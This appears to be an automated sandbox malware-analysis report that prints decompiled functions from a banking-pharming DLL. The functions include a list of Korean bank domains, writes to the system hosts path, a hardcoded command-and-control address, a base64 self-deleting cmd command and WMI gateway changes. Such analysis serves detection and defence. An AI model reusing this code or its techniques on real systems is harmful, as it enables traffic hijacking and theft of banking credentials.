Instruction Fuzzy Hash: ADF02E2264E3156DF610B7347C64A27BB98DF4332BB150F97DC40D6095DD15E8028AE5

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 10005318 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 53
libraryCOMMON

Download Yara Rule

C-Code - Quality: 35%

			E10005318(void* __ecx, void* __eflags, intOrPtr _a4) {
				void _v4099;
				signed char _v4100;
				signed char* _t20;
				signed char* _t25;
				intOrPtr* _t31;
				signed char* _t32;
				void* _t33;
				void* _t35;

				E1000CD20(0x1000, __ecx);
				_v4100 = _v4100 & 0x00000000;
				_push("www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.co.ki|www.keb.co.kr.ki|www.kfcc.co.kr.ki|www.lottirich.co.ki|www.nlotto.co.ki|www.gmarket.net|nate.com|www.nate.com|daum.com|www.daum.net|daum.net|www.zum.com|zum.com|naver.com|www.nonghyup.com|www.naver.com||www.nate.net|hanmail.net|www.hanmail.net|www.hanacbs.com|kfcc.co.ki|www.kfcc.co.ki|www.daum.net|daum.net|www.kbstir.com|www.nonghuyp.com|www.wooribank.com|www.ibek.co.ki|www.epostbenk.go.ki|www.hanabenk.com|www.keb.co.ki|www.citibank.co.ki|www.citibank.co.kr.ki|www.standardchartered.co.kr.ki|www.standardchartered.co.ki|www.suhyup-bank.com.ki|www.suhyup-bank.com|www.kjbank.com.ki|www.kjbank.com|openbank.cu.co.kr.ki|openbank.cu.co.ki|www.knbank.co.ki|www.knbank.co.kr.ki|www.busanbank.co.kr.ki|www.busanbank.co.ki|www.suhyup-bank.com|www.suhyup-bank.com.ki|www.standardchartered.co.kr.ki|www.nonghuyp.com.ki|");
				memset( &_v4099, 0, 0x3ff << 2);
				asm("stosw");
				asm("stosb");
				E1000CD0E(0,  &_v4100);
				_pop(_t31);
				0x100411b9();
				_t25 =  &_v4100;
				_t20 =  *_t31( &_v4100, 0x7c);
				_t35 = _t33 + 0x1c;
				while(1) {
					_t32 = _t20;
					if(_t32 == 0) {
						break;
					}
					 *_t32 =  *_t32 & 0x00000000;
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					E1000CD08(0, _a4);
					_t12 =  &(_t32[1]); // 0x1
					_t25 = _t12;
					_t20 =  *_t31(_t25, 0x7c, "\r\n", _t25, "    ", 0x10016ae0);
					_t35 = _t35 + 0x28;
				}
				return _t20;
			}

0x10005320
0x10005325
0x1000533c
0x10005341
0x10005343
0x10005345
0x1000534d
0x10005352
0x10005353
0x10005361
0x10005367
0x10005369
0x1000536c
0x1000536c
0x10005370
0x00000000
0x00000000
0x10005372
0x1000537d
0x1000538a
0x10005393
0x100053a0
0x100053a5
0x100053a5
0x100053ab
0x100053ad
0x100053ad
0x100053b6

APIs

LdrInitializeThunk.NTDLL ref: 1000537D
LdrInitializeThunk.NTDLL ref: 1000538A
LdrInitializeThunk.NTDLL ref: 10005393
LdrInitializeThunk.NTDLL ref: 100053A0

Strings

, xrefs: 10005382
www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c, xrefs: 1000533C

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: InitializeThunk
String ID: $www.shinhan.com|search.daum.net|search.naver.com|www.kbstar.com.ki|www.knbank.co.kr.ki|openbank.cu.co.kr.ki|www.busanbank.co.kr.ki|www.nonghyup.com.ki|www.shinhan.com.ki|www.wooribank.com.ki|www.hanabank.com.ki|www.epostbank.go.kr.ki|www.ibk.co.kr.ki|www.idk.c
API String ID: 2994545307-230412946
Opcode ID: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
Instruction ID: c97ba9839e98783193aeac5bdf29b258f442598287bfd32f3df003f3fcbf67da
Opcode Fuzzy Hash: 0f0ee0e88a780dbc9f243c599f27c9996d1cd9e2b5f38b67b3bf5a9e7d824a77
Instruction Fuzzy Hash: 8501B53690421D76EB12E768CC41FDE7F58EF482C1F104476F648AA096D7B5BAC45A90

Uniqueness

Uniqueness Score: -1.00%

Function 10008656 Relevance: 44.0, APIs: 20, Strings: 5, Instructions: 224
threadsleepCOMMON

Download Yara Rule

C-Code - Quality: 51%

			E10008656(void* __ecx, void* __edx, void* __esi, void* __eflags, void* __fp0, signed int _a12) {
				void* _v19;
				char _v20;
				void _v1043;
				char _v1044;
				char _v1444;
				void* _v1452;
				void* __ebx;
				void* __edi;
				void* __ebp;
				void* _t15;
				CHAR* _t18;
				signed int _t22;
				void* _t24;
				void* _t31;
				intOrPtr* _t39;
				void* _t40;
				void* _t43;
				void* _t48;
				void* _t52;
				void* _t53;
				void* _t56;
				intOrPtr _t64;
				void* _t66;

				_t79 = __fp0;
				_t63 = __esi;
				_t55 = __edx;
				_t15 = E10005989(_t43, __ecx, __edx, _t56, __esi, _t66, __eflags, __fp0);
				0x100337e0(0, 1, "F896SD5DAE", 0x10015a68);
				asm("daa");
				0x1003b59a(_t66);
				if(_t15 != 0xb7) {
					_t72 = _t15 - 5;
					if(_t15 != 5) {
						E100042A2(0, _t72, __fp0, "SeDebugPrivilege", 1);
						_t24 = E10005986();
						0x1004075a(0x100168d4, __esi);
						_t64 =  *0x1000e094;
						if(_t24 == 0) {
							_t39 = E100044AD(_t24, __edx, 0x35);
							_pop(_t53);
							if(_t39 != 0xffffffff) {
								_t39 = E10004351(_t39, _t53, __edx, __fp0, _t39, "123");
								_pop(_t53);
							}
							0x10030e70(0);
							_t66 = 0x100168d4;
							asm("adc [esp+edx+0x68], dh");
							asm("rol byte [edi], 1");
							 *_t39 =  *_t39 + _t39;
							Sleep(??);
							_t2 =  &_a12; // 0x0
							_push( *_t2);
							_t40 = L1002E51E(_t39, _t53, _t66);
							asm("repe call 0xffffbd83");
							_t76 = _t40;
							if(_t40 == 0) {
								CreateThread(0, 0, E10008578, 0, 0, 0);
							}
							E10006DD5(0, _t53, _t55, 0x100168d4, _t64, _t76, _t79);
						}
						CreateThread(0, 0, E10006EE7, 0, 0, 0);
						Sleep(0x3e8);
						_t3 =  &_v1444; // 0x10016334
						0x10033977(0x202, _t3);
						CreateThread(0, 0, E10006B30, "107.163.56.251:6658", 0, 0);
						CreateThread(0, 0, E10008208, 0, 0, 0);
						Sleep(0xbb8);
						_v20 = 0;
						asm("stosd");
						asm("stosd");
						asm("stosd");
						asm("stosw");
						asm("stosb");
						_t6 =  &_v20; // 0x100168c4
						_t31 = E10005ACA(_t76, _t6);
						_t77 = _t31 - 5;
						_t52 = _t66;
						if(_t31 < 5) {
							CreateThread(0, 0, E10007112, 0, 0, 0);
						}
						CreateThread(0, 0, E1000827D, 0, 0, 0);
						Sleep(0xbb8);
						CreateThread(0, 0, E1000490F, 0, 0, 0);
						CreateThread(0, 0, E10006EEF, 0, 0, 0);
						if(E10004482(_t52, _t77, _t79) == 0) {
							Sleep(0x927c0);
							CreateThread(0, 0, 0x10006a7f, 0, 0, 0);
							Sleep(0x1388);
							CreateThread(0, 0, E1000842D, 0, 0, 0);
						}
						Sleep(0xffffffff);
						L13:
						Sleep(0x36ee80);
						goto L13;
					}
				}
				_v1044 = 0;
				memset( &_v1043, 0, 0xff << 2);
				asm("stosw");
				asm("stosb");
				_t18 = E10001000(0, __eflags, _t79, "Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=");
				_t48 = 0x100167d0;
				wsprintfA( &_v1044, _t18);
				_push(0);
				_t22 = E100255A5(0, _t48,  &_v1043 + 0xff, _t63, _t66, _t55,  &_v1044);
				__eflags = _a12;
				if(_a12 != 0) {
					Sleep(0x7d0);
					0x10041059(_a12);
					__eflags = _t22 & 0xc3c95b5f;
					return _t22;
				}
				return _t22;
			}

0x10008656
0x10008656
0x10008656
0x10008661
0x1000867b
0x10008680
0x10008682
0x1000868c
0x10008692
0x10008695
0x100086a3
0x100086aa
0x100086b5
0x100086bb
0x100086c3
0x100086c7
0x100086cf
0x100086d0
0x100086d8
0x100086de
0x100086de
0x100086e1
0x100086e8
0x100086e9
0x100086ed
0x100086ef
0x100086f1
0x100086f7
0x100086f7
0x100086fa
0x100086ff
0x10008705
0x10008707
0x10008713
0x10008713
0x10008715
0x10008715
0x10008724
0x10008731
0x10008733
0x10008740
0x10008753
0x1000875f
0x10008766
0x1000876d
0x10008770
0x10008771
0x10008772
0x10008773
0x10008775
0x10008776
0x1000877a
0x1000877f
0x10008782
0x10008783
0x1000878f
0x1000878f
0x1000879b
0x100087a8
0x100087b4
0x100087c0
0x100087cf
0x100087d6
0x100087e2
0x100087e9
0x100087f5
0x100087f5
0x100087f9
0x100087fc
0x10008801
0x00000000
0x10008801
0x10008695
0x10008812
0x10008818
0x1000881a
0x10008826
0x10008827
0x1000882c
0x10008835
0x10008844
0x10008847
0x1000884c
0x1000884f
0x10008856
0x1000885f
0x10008864
0x00000000
0x10008864
0x10008868

APIs

Part of subcall function 10005989: wsprintfA.USER32 ref: 100059AE
Part of subcall function 10005989: wsprintfA.USER32 ref: 100059FB
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A08
Part of subcall function 10005989: wsprintfA.USER32 ref: 10005A19

Sleep.KERNEL32(00000000,100168D4,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100086F1
CreateThread.KERNEL32(00000000,00000000,10008578,00000000,00000000,00000000), ref: 10008713
CreateThread.KERNEL32(00000000,00000000,10006EE7,00000000,00000000,00000000), ref: 10008724
Sleep.KERNEL32(000003E8,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008731
CreateThread.KERNEL32(00000000,00000000,10006B30,107.163.56.251:6658,00000000,00000000), ref: 10008753
CreateThread.KERNEL32(00000000,00000000,10008208,00000000,00000000,00000000), ref: 1000875F
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008766
CreateThread.KERNEL32(00000000,00000000,10007112,00000000,00000000,00000000), ref: 1000878F
CreateThread.KERNEL32(00000000,00000000,1000827D,00000000,00000000,00000000), ref: 1000879B
Sleep.KERNEL32(00000BB8,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087A8
CreateThread.KERNEL32(00000000,00000000,1000490F,00000000,00000000,00000000), ref: 100087B4
CreateThread.KERNEL32(00000000,00000000,10006EEF,00000000,00000000,00000000), ref: 100087C0
Sleep.KERNEL32(000927C0,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087D6
CreateThread.KERNEL32(00000000,00000000,10006A7F,00000000,00000000,00000000), ref: 100087E2
Sleep.KERNEL32(00001388,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087E9
CreateThread.KERNEL32(00000000,00000000,1000842D,00000000,00000000,00000000), ref: 100087F5
Sleep.KERNEL32(000000FF,?,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 100087F9
Sleep.KERNEL32(0036EE80,00000202,?,?,?,00000000,00000001,F896SD5DAE,10015A68), ref: 10008801
wsprintfA.USER32 ref: 10008835
Sleep.KERNEL32(000007D0,?,?,00000000), ref: 10008856

Strings

SeDebugPrivilege, xrefs: 1000869E
107.163.56.251:6658, xrefs: 10008747
123, xrefs: 100086D2
Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=, xrefs: 10008821
F896SD5DAE, xrefs: 10008671

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: CreateThread$Sleep$wsprintf
String ID: 107.163.56.251:6658$123$F896SD5DAE$SeDebugPrivilege$Y21kLmV4ZSAvYyBwaW5nIDEyNy4wLjAuMSAtbiAzJnJkIC9zIC9xICIlcyI=
API String ID: 2554219641-707305509
Opcode ID: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
Instruction ID: 562cb21c62d1d749736fc9fe061952e86694a01f598b035fd930608b54173050
Opcode Fuzzy Hash: 4d641853ec3f79a3dbb5832569c2fe77b73b8d86d46ad646e8268de1bcf92bc3
Instruction Fuzzy Hash: 8B51BEE150435CBEF710E7788CC5EBB3A9CEF442D9F11092AF255A508ADFB4AD408A76

Uniqueness

Uniqueness Score: -1.00%

Function 100053B7 Relevance: 28.2, APIs: 12, Strings: 4, Instructions: 229
sleepfileCOMMON

Download Yara Rule

C-Code - Quality: 40%

			E100053B7(void* __ebx, void* __ecx, void* __edx, void* __eflags, void* __fp0, intOrPtr _a4, intOrPtr* _a8, signed int _a12) {
				intOrPtr _v8;
				void _v71;
				char _v72;
				void _v331;
				char _v332;
				void _v591;
				char _v592;
				void _v851;
				char _v852;
				void _v4947;
				signed char _v4948;
				void* __edi;
				void* __esi;
				void* __ebp;
				int _t82;
				int _t86;
				int _t88;
				CHAR* _t104;
				void* _t118;
				signed int _t120;
				signed int _t122;
				signed int _t124;
				signed int _t126;
				signed int _t128;
				signed int _t130;
				CHAR* _t132;
				CHAR* _t136;
				CHAR* _t138;
				intOrPtr _t142;
				signed int _t147;
				signed int _t151;
				void* _t155;
				void* _t157;
				signed int _t158;
				signed int _t162;
				signed int _t163;
				signed int _t164;
				signed int _t165;
				signed int _t166;
				signed int _t167;
				void* _t168;
				int _t169;
				void* _t170;
				int _t183;
				intOrPtr _t186;
				void* _t198;
				void* _t199;
				void* _t202;
				intOrPtr _t204;
				void* _t205;
				void* _t206;
				signed int _t216;
				void* _t220;

				_t220 = __fp0;
				_t170 = __edx;
				_t144 = __ecx;
				E1000CD20(0x1350, __ecx);
				if(_a12 != 0) {
					_t82 =  *0x10015fb8; // 0x0
					_t202 =  *((intOrPtr*)(_a8 + 0xc)) - _t82;
					_t183 = 0;
					__eflags = 0;
					do {
						_push(_t82 + 0xfffffffe);
						_push(_a4 + _t183);
						_push( *0x10015fc8);
						_t86 = E1000CDA6(_a4 + _t183, _t144, _t170, __eflags);
						_t206 = _t206 + 0xc;
						__eflags = _t86;
						_t82 =  *0x10015fb8; // 0x0
						if(_t86 == 0) {
							_t183 = _t183 + _t82 - 1;
						}
						_t183 = _t183 + 1;
						__eflags = _t183 - _t202;
					} while (__eflags <= 0);
				} else {
					_t204 =  *0x1000e1b8;
					_t142 =  *0x1000e248;
					_t186 =  *((intOrPtr*)(_a8 + 0xc)) -  *0x10015fb8;
					_t4 =  &_a12;
					 *_t4 = _a12 & 0x00000000;
					_t216 =  *_t4;
					_v8 = _t186;
					do {
						_t88 =  *0x10015fb8; // 0x0
						_push(_t88 - 1);
						_push(_a12 + _a4);
						_push( *0x10015fc8);
						_t82 = E1000CDA6(_a4, _a12 + _a4, _t170, _t216);
						_t206 = _t206 + 0xc;
						_t217 = _t82;
						if(_t82 == 0) {
							_v72 = _v72 & _t82;
							_t147 = 0xf;
							memset( &_v71, _t82, _t147 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v72, "%s\\%s", 0x100165a4, 0x100165a8);
							_v4948 = _v4948 & 0x00000000;
							memset( &_v4947, 0, 0x3ff << 2);
							asm("stosw");
							asm("stosb");
							E10005318(0, _t217,  &_v4948);
							_v852 = _v852 & 0x00000000;
							_t151 = 0x40;
							_v592 = _v592 & 0x00000000;
							memset( &_v851, 0, _t151 << 2);
							asm("stosw");
							asm("stosb");
							_push(0x40);
							memset( &_v591, 0, 0 << 2);
							asm("stosw");
							asm("stosb");
							wsprintfA( &_v852, "c:\\windows\\system32\\drivers\\%s", 0x100165a4);
							_push(0x100165a8);
							_t104 = E10001000(0, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz");
							_t155 = 0x100165a4;
							wsprintfA( &_v592, _t104);
							_push(0);
							_push( &_v852);
							E1002B8D2(_t142, _t155, _t170, 0x100165a4, _t204);
							asm("cdq");
							E1000443D( &_v4948, _t142, _t155, _t170,  &_v4948,  &_v592);
							_pop(_t157);
							E10021A45( *_a8 + _a12, _t142, _t157, _t170, 0x100165a4, _t204, _t217);
							_v332 = _v332 & 0x00000000;
							_t158 = 0x40;
							_t118 = memset( &_v331, 0, _t158 << 2);
							asm("stosw");
							asm("stosb");
							0x1003a38c(_t142, 0, _t170,  *0x10015ff4,  *_a8 + _a12,  &_v72, 9, 0);
							E100274E5(_t118, _t142, _t170, _t204, _t205, _t217);
							_t120 = rand();
							asm("cdq");
							_t162 = 0x18;
							_t198 = 0x61;
							_t122 = rand();
							asm("cdq");
							_t163 = 0x19;
							_t124 = rand();
							asm("cdq");
							_t164 = 0x17;
							_t126 = rand();
							asm("cdq");
							_t165 = 0x19;
							_t128 = rand();
							asm("cdq");
							_t166 = 0x18;
							_t130 = rand();
							asm("cdq");
							_t167 = 0x19;
							_t170 = _t130 % _t167 + _t198;
							_t132 = E10001000(_t167, _t217, _t220, "Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj");
							_t168 = _t170;
							wsprintfA( &_v332, _t132);
							_t206 = _t206 + 0x8c;
							_t136 =  &_v332;
							0x10036371(0x40000000, 1, 0, 2, 0, 0, _t128 % _t166 + _t198, _t126 % _t165 + _t198, _t124 % _t164 + _t198, _t122 % _t163 + _t198, _t120 % _t162 + _t198, 0, _t118);
							_t199 = _t136;
							_push(_t136);
							_push(_t170);
							E10023C7B(_t136, _t142, _t168, _t199, _t204, 0);
							Sleep(0x3e8);
							_t138 =  &_v332;
							_push(_t138);
							_push(_t138);
							E1002EC87(_t138, _t142, _t168, 0);
							_t169 =  *0x10015fb8; // 0x0
							_t186 = _v8;
							_t82 = _a12 + _t169 - 1;
							_a12 = _t82;
						}
						_a12 = _a12 + 1;
					} while (_a12 <= _t186);
				}
				return _t82;
			}

APIs

wsprintfA.USER32 ref: 10005437

Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000537D
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 1000538A
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 10005393
Part of subcall function 10005318: LdrInitializeThunk.NTDLL ref: 100053A0

wsprintfA.USER32 ref: 1000549E
wsprintfA.USER32 ref: 100054BC
PrintFile.ABC(?,?,?,00000000), ref: 100054DE
rand.MSVCRT ref: 1000552A
rand.MSVCRT ref: 10005538
rand.MSVCRT ref: 10005543
rand.MSVCRT ref: 1000554E
rand.MSVCRT ref: 10005559
rand.MSVCRT ref: 10005564
wsprintfA.USER32 ref: 10005582
Sleep.KERNEL32(000003E8,?,00000000,40000000,00000001,00000000,00000002,00000000,00000000,?,?,?,?,00000009,00000000,?), ref: 100055AE

Strings

Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz, xrefs: 100054A9
%s\%s, xrefs: 10005431
Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj, xrefs: 1000556F
c:\windows\system32\drivers\%s, xrefs: 10005498

Memory Dump Source

Source File: 0000000C.00000002.281268332.0000000010001000.00000020.00000001.01000000.00000003.sdmp, Offset: 10000000, based on PE: true

Associated: 0000000C.00000002.281206985.0000000010000000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281364656.000000001000E000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281387007.0000000010012000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281438430.000000001001F000.00000020.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281510290.0000000010044000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 0000000C.00000002.281593855.0000000010057000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_10000000_rundll32.jbxd

Similarity

API ID: rand$InitializeThunkwsprintf$FilePrintSleep
String ID: %s\%s$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXCVzXCVz$Yzpcd2luZG93c1xzeXN0ZW0zMlxkcml2ZXJzXGV0Y1wlYyVjJWMuJWMlYyVj$c:\windows\system32\drivers\%s
API String ID: 3997227624-455112146
Opcode ID: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
Instruction ID: 64546e9388752df838bc4033515aa0a8afcfc879ecc6bfc3b3dc2cd959c3d1fd
Opcode Fuzzy Hash: 731ecbc4af44be48af7f3cadb81ee3d2e4ac7428d053c81ec5cd6aa81a9daadb
Instruction Fuzzy Hash: 0D610873A40258BFEB10DB64CC46FDF77ADEB84351F184466F604AB180CBB5EA818A64

Uniqueness

Uniqueness Score: -1.00%

Function 1000721F Relevance: 26.6, APIs: 6, Strings: 9, Instructions: 366
COMMON

Download Yara Rule

C-Code - Quality: 55%

			E1000721F(void* __ebx, void* __ecx, intOrPtr __edx, intOrPtr* __edi, void* __esi, void* __eflags, void* __fp0) {
				void* _t141;
				void* _t142;
				intOrPtr* _t150;
				intOrPtr _t151;
				intOrPtr* _t152;
				intOrPtr _t153;
				intOrPtr* _t160;
				intOrPtr _t161;
				void* _t162;
				intOrPtr* _t164;
				intOrPtr _t165;
				intOrPtr* _t170;
				intOrPtr _t171;
				intOrPtr _t173;
				intOrPtr _t177;
				intOrPtr _t178;
				intOrPtr* _t183;
				intOrPtr _t184;
				intOrPtr* _t188;
				intOrPtr _t189;
				intOrPtr* _t193;
				intOrPtr* _t194;
				void* _t196;
				signed int _t201;
				intOrPtr _t204;
				void* _t209;
				intOrPtr* _t210;
				intOrPtr _t215;
				intOrPtr* _t226;
				intOrPtr* _t229;
				intOrPtr* _t230;
				intOrPtr* _t239;
				intOrPtr* _t242;
				intOrPtr* _t245;
				intOrPtr _t256;
				intOrPtr _t260;
				intOrPtr* _t261;
				void* _t266;

				_t307 = __fp0;
				_t272 = __eflags;
				_t254 = __edi;
				_t250 = __edx;
				_t209 = __ebx;
				E1000CDA0(__ebx, __ecx, __edx, __edi, __esi, __eflags);
				_push(__esi);
				E1000774B();
				_push("IPEnabled=TRUE");
				_push("Win32_NetworkAdapterConfiguration");
				 *((intOrPtr*)(_t266 - 4)) = 0;
				if(E100077B2(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t272, __fp0) == 0) {
					L61:
					_t215 = _t266 - 0x7c;
					 *((intOrPtr*)(_t266 - 4)) = 0xb;
					_t141 = E1002A8C6(E10007A27(_t215), _t209, _t215, _t250, _t254, _t266);
					asm("cld");
					 *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) =  *((intOrPtr*)(_t266 - 1 + 0x4ce8944d)) - 1;
					asm("adc al, [eax]");
					 *((intOrPtr*)(_t209 + 0x645ef44d)) =  *((intOrPtr*)(_t209 + 0x645ef44d)) + _t215;
					 *0 = _t215;
					return _t141;
				} else {
					_push(__edi);
					 *((intOrPtr*)(_t266 - 0x14)) = 0;
					 *((char*)(_t266 - 4)) = 1;
					if( *((intOrPtr*)(_t266 - 0x68)) != 0) {
						_t201 =  *((intOrPtr*)(_t266 - 0x64)) -  *((intOrPtr*)(_t266 - 0x68));
						_t275 = _t201 & 0xfffffffc;
						if((_t201 & 0xfffffffc) > 0) {
							_push("Index");
							_push(0);
							_push(_t266 - 0x28);
							_t254 = E10007A73(__ebx, _t266 - 0x7c, __edx, __edi, 0, _t275, __fp0);
							_t204 =  *_t254;
							if(_t204 != 0) {
								0x1003afbd(_t254, _t204 + 8);
							}
							E10007696(_t266 - 0x14);
							 *((intOrPtr*)(_t266 - 0x14)) =  *_t254;
							E10007696(_t266 - 0x28);
						}
					}
					_t142 = E1000767F(_t266 - 0x14, _t250);
					_t278 = _t142;
					if(_t142 == 0) {
						L59:
						_t217 =  *((intOrPtr*)(_t266 - 0x14));
						_pop(_t254);
						if( *((intOrPtr*)(_t266 - 0x14)) != 0) {
							E1000515C(_t142, _t217);
							 *((intOrPtr*)(_t266 - 0x14)) = 0;
						}
						goto L61;
					}
					_push(_t209);
					_push("Win32_NetworkAdapterConfiguration.Index=");
					E1000504D(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t219 = _t266 - 0x18;
					_push(_t266 - 0x14);
					 *((char*)(_t266 - 4)) = 2;
					_t142 = E1000762A(_t209, _t266 - 0x18, _t250, _t254, 0, _t278, _t307);
					_t210 =  *0x1000e218;
					 *((intOrPtr*)(_t266 - 0x10)) = 0;
					 *((intOrPtr*)(_t266 - 0x28)) = 0;
					if( *((intOrPtr*)(_t266 + 8)) != 0) {
						_push( *((intOrPtr*)(_t266 + 8)));
						_t142 = E1000CD02(_t219, 0);
						_t280 = _t142;
						_pop(_t219);
						if(_t142 != 0) {
							_t219 = _t266 - 0x7c;
							_push(_t266 - 0x10);
							_push("SetGateways");
							_t142 = E10007CDC(_t210, _t266 - 0x7c, _t250, _t254, 0, _t280, _t307);
							_t281 = _t142;
							if(_t142 >= 0) {
								asm("stosd");
								_t260 = 1;
								 *((intOrPtr*)(_t266 - 0x38)) = 0;
								_push( *((intOrPtr*)(_t266 + 8)));
								 *((intOrPtr*)(_t266 - 0x3c)) = _t260;
								E1000504D(_t210, _t266 - 0x24, _t250, _t260, 0, _t281, _t307);
								_t170 =  *((intOrPtr*)(_t266 - 0x24));
								 *((char*)(_t266 - 4)) = 3;
								_t282 = _t170;
								if(_t170 == 0) {
									_t171 = 0;
									__eflags = 0;
								} else {
									_t171 =  *_t170;
								}
								 *((intOrPtr*)(_t266 - 0x2c)) = _t171;
								_t173 =  *_t210(8, _t260, _t266 - 0x3c);
								_t261 =  *0x1000e230;
								 *((intOrPtr*)(_t266 - 0x1c)) = _t173;
								 *((intOrPtr*)(_t173 + 0xc)) = _t266 - 0x2c;
								 *_t261(_t266 - 0x4c);
								 *((intOrPtr*)(_t266 - 0x44)) =  *((intOrPtr*)(_t266 - 0x1c));
								_t177 = 1;
								 *((short*)(_t266 - 0x4c)) = 0x2008;
								 *((intOrPtr*)(_t266 - 0x30)) = _t177;
								_t178 =  *_t210(3, _t177, _t266 - 0x3c);
								 *((intOrPtr*)(_t266 - 0x20)) = _t178;
								 *((intOrPtr*)(_t178 + 0xc)) = _t266 - 0x30;
								 *_t261(_t266 - 0x5c);
								_push("DefaultIPGateway");
								 *((short*)(_t266 - 0x5c)) = 0x2003;
								 *((intOrPtr*)(_t266 - 0x54)) =  *((intOrPtr*)(_t266 - 0x20));
								_t183 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8, _t250, _t261, 0, _t282, _t307)));
								 *((char*)(_t266 - 4)) = 4;
								_t283 = _t183;
								if(_t183 == 0) {
									_t184 = 0;
									__eflags = 0;
								} else {
									_t184 =  *_t183;
								}
								_t239 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t239 + 0x14))(_t239, _t184, 0, _t266 - 0x4c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("GatewayCostMetric");
								_t188 =  *((intOrPtr*)(E1000504D(_t210, _t266 + 8,  *_t239, _t266 - 0x4c, 0, _t283, _t307)));
								 *((char*)(_t266 - 4)) = 5;
								_t284 = _t188;
								if(_t188 == 0) {
									_t189 = 0;
									__eflags = 0;
								} else {
									_t189 =  *_t188;
								}
								_t242 =  *((intOrPtr*)(_t266 - 0x10));
								 *((intOrPtr*)( *_t242 + 0x14))(_t242, _t189, 0, _t266 - 0x5c, 0);
								 *((char*)(_t266 - 4)) = 3;
								E10007696(_t266 + 8);
								_push("SetGateways");
								_t193 =  *((intOrPtr*)(E1000504D(_t210, _t266 - 0x34,  *_t242, _t266 - 0x5c, 0, _t284, _t307)));
								 *((char*)(_t266 - 4)) = 6;
								if(_t193 == 0) {
